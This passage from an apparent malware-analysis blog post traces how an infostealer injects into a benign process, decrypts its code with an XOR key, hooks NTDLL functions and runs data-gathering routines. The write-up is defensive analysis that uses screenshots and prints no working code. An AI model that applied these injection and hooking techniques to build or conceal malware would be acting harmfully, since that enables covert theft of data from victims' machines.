1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> The targeted file’s entry point will be replaced with a jump offset to that of the injector module’s entry point (f5ee03fed0133bb06d4cc52b0232fec0) before resuming the suspended process. This is a technique used by the malware in order to pass the execution from targeted file to the malware’s component file. Remember that the targeted file is non-malicious in nature but the code that it jumps to is malicious. This is done to hide the component file and avoid detection by antivirus products. Also take note that NO component files were dropped nor created by the malware, all of these were done in memory.</span></span></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 15px;"> </span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP3Oca_H-EX55-94RLAMQglWvbBZMntaLCHeHxxamYQy8XtSkKYDYRB0P_r3wAjkl9gz6VTAVQ7ptJ15mK8g7VjP0buimit0Zr4qU58Q7rR0_MmGdMSsxwWR5iR1eIL3EbX6mshoY7/s1600/overwrite_host_ep.png" imageanchor="1" style="font-family: Tahoma; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="46" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP3Oca_H-EX55-94RLAMQglWvbBZMntaLCHeHxxamYQy8XtSkKYDYRB0P_r3wAjkl9gz6VTAVQ7ptJ15mK8g7VjP0buimit0Zr4qU58Q7rR0_MmGdMSsxwWR5iR1eIL3EbX6mshoY7/s320/overwrite_host_ep.png" width="320" /></a></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 15a: Bytes in targeted file’s entry point are overwritten to pass the execution to malware’s own entry point</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><b><i>f5ee03fed0133bb06d4cc52b0232fec0 – The Executable Module a.k.a. “The Injector”</i></b></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><b><br /></b></span></span></div>
<div style="line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<div style="font-family: Tahoma;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><b> </b></span> <span style="font-size: 11pt;">When the code execution is passed to the injector module (f5ee03fed0133bb06d4cc52b0232fec0) in memory, the first thing it will do is to fill and rebuild its Import Address Table.</span></span></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 15px;"> </span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ5fOUoiWcZ-ZpeAvuUAL3OJWG9BgvufYDPJJrhxOyW3LfODEUxhd0aIJTzetl8VprECRVPEDE9pMx6X2I-iy_atMRJIz7CGk6dmq9xDZ0ieDUZLu5Om6mx7w4z80nkbN_Egt9RWWn/s1600/rebuild_iat.png" imageanchor="1" style="font-family: Tahoma; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ5fOUoiWcZ-ZpeAvuUAL3OJWG9BgvufYDPJJrhxOyW3LfODEUxhd0aIJTzetl8VprECRVPEDE9pMx6X2I-iy_atMRJIz7CGk6dmq9xDZ0ieDUZLu5Om6mx7w4z80nkbN_Egt9RWWn/s320/rebuild_iat.png" width="320" /></a></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 16: Rebuilding Import Address Table</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> </span></span></div>
<div style="line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<div style="font-family: Tahoma;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> Next is it will set up a file named “sortxxxx.nls” (where “xxxx” is a string generated by GetTickCount) where modules of the infostealer component (9a9e77d2b7792fbbddcd7ce05a4eb26e) will be copied afterwards.</span></span></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 15px;"> </span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI2HYQ4SB7fQaEl-N4b0ofdEL-SQSojq9mxI9HAoV6VzAWA_qs38fioU6MXI5n0rb6hKBGZ3bU3JbqwTgDVB-V0kqopUeVwwJTNLKB6Gso7LQCai8qWRjspi_Td4AtjX0LjwtaiUN_/s1600/prepare_sortxxx_nls.png" imageanchor="1" style="font-family: Tahoma; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI2HYQ4SB7fQaEl-N4b0ofdEL-SQSojq9mxI9HAoV6VzAWA_qs38fioU6MXI5n0rb6hKBGZ3bU3JbqwTgDVB-V0kqopUeVwwJTNLKB6Gso7LQCai8qWRjspi_Td4AtjX0LjwtaiUN_/s320/prepare_sortxxx_nls.png" width="320" /></a></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 17: Preparing “sortxxxx.nls”.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<div style="font-family: Tahoma;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> This is followed by decrypting more of its code at target location 0x00401080 using simple XOR EAX, 0x89719922 as key.</span></span></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 15px;"> </span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXnIZ3zUnYvT9yniq5A18c0jf_rdnk3rmKoQ5-hzGSXzSBs0pTofgBUT9W6FtNMGxmi3moMuGTYJl7R3gnncOIILWmckc5AXtasiR7P-b4eJxZhhNMqDFEAUfFEyVYuzETOluewnQN/s1600/dec_key.png" imageanchor="1" style="font-family: Tahoma; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXnIZ3zUnYvT9yniq5A18c0jf_rdnk3rmKoQ5-hzGSXzSBs0pTofgBUT9W6FtNMGxmi3moMuGTYJl7R3gnncOIILWmckc5AXtasiR7P-b4eJxZhhNMqDFEAUfFEyVYuzETOluewnQN/s320/dec_key.png" width="320" /></a></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 18: Decrypting more code, 0x89719922 as decryption key.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> It will then call CreateRemoteThread API to create a thread leading to the execution of the newly decrypted code at 0x00401080. The newly created thread maps a copy of its malicious DLL component (9a9e77d2b7792fbbddcd7ce05a4eb26e) in memory (remember sortxxxx.nls?).</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifW8pTcLeuKlpaFHIOzTTXI0UdxnThIuvBt9sPoVpVZOHWEiDeFE6qxuaYrV6xYdA2Q98QDx547EWU3Fni6drEmolr_xkSFCjHIlaZ3rQJUiDlnzAg5uJWtASkdDfOYbnq-1wqqsii/s1600/dll_copytomem.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifW8pTcLeuKlpaFHIOzTTXI0UdxnThIuvBt9sPoVpVZOHWEiDeFE6qxuaYrV6xYdA2Q98QDx547EWU3Fni6drEmolr_xkSFCjHIlaZ3rQJUiDlnzAg5uJWtASkdDfOYbnq-1wqqsii/s320/dll_copytomem.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 19: DLL component is copied to memory</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> It also demonstrates rootkit capabilities by patching some functions of NTDLL.DLL in memory in order to route execution to the malware itself first before passing to the actual function(s). Some patched functions are:</span></span></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ZwMapViewOfSection</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ZwCreateSection</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ZwOpenFile</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ZwClose</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ZwQueryAttributesFile</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ZwQuerySection</span></div>
</li>
</ul>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm 13mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">Figures below demonstrate how code rerouting is done.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Yz2oI6N6l5faQHvaRbmYzQ9WAnhIzwJZYt2wvUQoqF8FuLR9YkUzC1qZ5zdOAwd4bM0WRF5fOlGbgCISxaUzpV7PaVas-FvmrfQrSdizUt0cCE31kbXtSwtmWQo4Zgwd4IpmtLnp/s1600/code_reroute1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="20" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Yz2oI6N6l5faQHvaRbmYzQ9WAnhIzwJZYt2wvUQoqF8FuLR9YkUzC1qZ5zdOAwd4bM0WRF5fOlGbgCISxaUzpV7PaVas-FvmrfQrSdizUt0cCE31kbXtSwtmWQo4Zgwd4IpmtLnp/s320/code_reroute1.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 20a: Overwrites 6 bytes of ntdll.dll .7C90DC55 NtMapViewOfSection to jump to malware code instead.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN80Z5Z7YP-62xNw82MfTSnmW7rHdNfeTl8lFXeRPlTpv9GPlxhyphenhyphenlyTendLr0BLBpzAUeDQ9xqFCTXZmXQb7-reasqnRS20c4x551_F862JsxlDMR0J10hmhBZ_YjmGyrXKL90edYz/s1600/code_reroute2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN80Z5Z7YP-62xNw82MfTSnmW7rHdNfeTl8lFXeRPlTpv9GPlxhyphenhyphenlyTendLr0BLBpzAUeDQ9xqFCTXZmXQb7-reasqnRS20c4x551_F862JsxlDMR0J10hmhBZ_YjmGyrXKL90edYz/s320/code_reroute2.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 20b: This is where the patched NtMapViewOfSection jumps to.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> It will then attempt to load “sortxxxx.nls” in memory using LoadLibraryW function and gets the function address of the 2</span><span style="font-size: 11pt;"><sup>nd</sup></span> <span style="font-size: 11pt;">exported function of the dll component using GetProcAddress. It will then pass the execution to export #2 by using call. This is better exemplified by Figure 21.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH_2ne7MNzFwF38Rf_ANV-5hVhsid70Dd_3UJjKSByCcxvIbKMj4G78N1RatMuBeCk4YFgWSWX6hbKOakekt4Z4oRggarHHqL_4eJ3JAW5Ukj9Uni1ezCFTr_q1Po_o70jQER46WfK/s1600/dll_func_num2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH_2ne7MNzFwF38Rf_ANV-5hVhsid70Dd_3UJjKSByCcxvIbKMj4G78N1RatMuBeCk4YFgWSWX6hbKOakekt4Z4oRggarHHqL_4eJ3JAW5Ukj9Uni1ezCFTr_q1Po_o70jQER46WfK/s320/dll_func_num2.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 21: DLL component export function #2 is now called.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><b><i>9a9e77d2b7792fbbddcd7ce05a4eb26e – The Dynamic Link Library Module a.k.a. “The InfoStealer”</i></b></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> The DLL component is the one responsible for stealing data from the infected system. It exports 5 functions which can be seen below:</span></span></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">#1 .100026EF - same as #2, a call to entry point</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">#2 .10002701 - main (entry point)</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">#3 .1000276A - same as #2, create thread to entry point</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">#4 .100025BF - infostealer</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">#5 .100025C4 - quit infostealer</span></div>
</li>
</ul>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm 13mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">This DLL module has nine routines all in all:</span></span></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">65h @ 0x100032E9: List running processes, look up account details</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTiFx9J9V11iZ_VPOfZRJgfXH8pniLcGgSLZBfvlipk80IlzE1EwyBxJMN471RJqtBokZsHHgFRg_YA2Nb1y9_-GjgECw1ocYPzzg0oOvVqny0uqOwJ4Zb4vNvGj_LlMjCXNQjuT9J/s1600/routine_65.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTiFx9J9V11iZ_VPOfZRJgfXH8pniLcGgSLZBfvlipk80IlzE1EwyBxJMN471RJqtBokZsHHgFRg_YA2Nb1y9_-GjgECw1ocYPzzg0oOvVqny0uqOwJ4Zb4vNvGj_LlMjCXNQjuT9J/s320/routine_65.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22a: Routine 65h, list running processes including account id.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">66h @ 0x10002F34: List available disk drives including mounted network drives, get drive type (removable, fixed, CD-ROM, RAM disk, or network drive), get volume information (serial number and volume label), and free disk space.</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZBL_EbtCln48c-lrkMB9WXEsfFlbi0uBu_4dVCkOH4nwPm2uS0nPYXyuzAHg46GuxeU13yOmcT-Pr-0_Hwxv1BQ_giUxy_7pu-2CAbFhLo3HowoTh60fEZh1gvtqrGIiO7BVJe2vu/s1600/routine_66.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZBL_EbtCln48c-lrkMB9WXEsfFlbi0uBu_4dVCkOH4nwPm2uS0nPYXyuzAHg46GuxeU13yOmcT-Pr-0_Hwxv1BQ_giUxy_7pu-2CAbFhLo3HowoTh60fEZh1gvtqrGIiO7BVJe2vu/s320/routine_66.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22b: Routine 66h, list numerous disk information.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">68h @ 0x10003ED0: Take a screenshot</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxELkTJTvcXW8i9igI5c2OXnLfAUY7ESyEPoV7V9OgELnHRBooH5Rn9m1x36LGdFOrnn0K6ePOptX2rHj5oHqfEZqAGwbao04_lTp4bdMuLNoLrMau5d7pYYD2sr4AtJFPSWF1yuT7/s1600/routine_68.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxELkTJTvcXW8i9igI5c2OXnLfAUY7ESyEPoV7V9OgELnHRBooH5Rn9m1x36LGdFOrnn0K6ePOptX2rHj5oHqfEZqAGwbao04_lTp4bdMuLNoLrMau5d7pYYD2sr4AtJFPSWF1yuT7/s320/routine_68.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22c: Routine 68h, a screenshot of “take a screenshot function”.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">69h @ 0x10005248: Get network parameters (hostname, domain name, dns server, etc.), retrieves the interface–to–IPv4 address mapping table, retrieves the IPv4 routing table, retrieves the MIB-II interface table, retrieves the IPv4 to physical address mapping table, retrieves the IPv4 TCP connection table, retrieves the IPv4 User Datagram Protocol (UDP) listener table, display dns cache and enumerate network connections and resources.</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4t2LW1lOP7JD4kf6b0mo5MytQ14G79Uc4kNmJ36xazCbrjtNUPkA__vg2r3xRD4TcgSdfKaejV6FaiOaRjJlqMliLkoljDeZAD1kIrUdZLwhlE-XOfdwPMue2j2wQddNFZZYDoto7/s1600/routine_69.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4t2LW1lOP7JD4kf6b0mo5MytQ14G79Uc4kNmJ36xazCbrjtNUPkA__vg2r3xRD4TcgSdfKaejV6FaiOaRjJlqMliLkoljDeZAD1kIrUdZLwhlE-XOfdwPMue2j2wQddNFZZYDoto7/s320/routine_69.png" width="320" /></a></div>
